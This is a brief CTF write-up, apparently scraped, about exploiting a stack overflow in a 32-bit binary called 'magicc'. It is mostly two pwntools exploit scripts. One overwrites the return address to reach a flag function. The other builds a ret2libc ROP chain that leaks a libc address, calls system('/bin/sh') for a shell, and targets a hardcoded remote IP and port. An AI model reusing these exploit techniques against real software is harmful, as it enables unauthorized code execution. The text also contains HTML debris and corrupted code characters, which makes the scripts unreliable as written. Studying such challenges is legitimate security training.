Magic is a relatively basic stack overflow;
First look at the protection mechanism that is turned on
Checksec magicc found only nx protection
We loaded ida and found overflow points
< p>The actual overflow space of Buf is 0x16, construct exp
import time
from pwn import *
p=process(‘./magicc’)
p>
p.recvuntil(‘Choose!’)
p.sendline(‘4’)
p.recvuntil(‘success’)
payload1=’A’*22
#system=
#asd=0x804876e
#ret=0x8048770
cat=0x80485AD
#hgd=0x80485a7
#exit_addr=0x8048450
#nxaddr=p32(0x80485A7)
payload=payload1+p32(cat )
p.sendline(payload)
p.interactive()
In addition, use rop
from pwn import *
context.log_level = “debug”
context.arch = “i386”
elf = ELF(“magicc”)
sh = 0
lib = 0
def pwn(ip,port,debug):
global sh
global lib
if(debug == 1):
sh = process(“./magicc”)
else:
sh = remote(ip, port)
lib = ELF(“libc6-i386_2.23-0ubuntu10_amd64.so”)
catFlag = 0x08048847
offset = 22
< p>sh.recv()
sh.sendline(“4”)
sh.recvuntil(“You are one step short of success
“)
< p>payload = offset * “a” + p32(elf.plt[‘puts’]) + p32(0x08048490) + p32(elf.got[‘__libc_start_main’])
sh.sendline(payload )
__libc_start_main = u32(sh.recv(4))
log.success(“__libc_start_main: “+ hex(__libc_start_main))
libc = __libc_start_main -lib.symbols[‘__libc_start_main’]
system = libc + lib.symbols[‘system’]
binsh = libc + lib.search(“/bin/sh� “).next()
sh.sendline(“4”)
sh.recv()
sh.sendline(offset * “a” + p32(elf.plt[‘system’]) + p32(0 x08048490) + p32(binsh))
sh.interactive()
if __name__ == “__main__”:
pwn(“101.71.29.5”, 10001,0)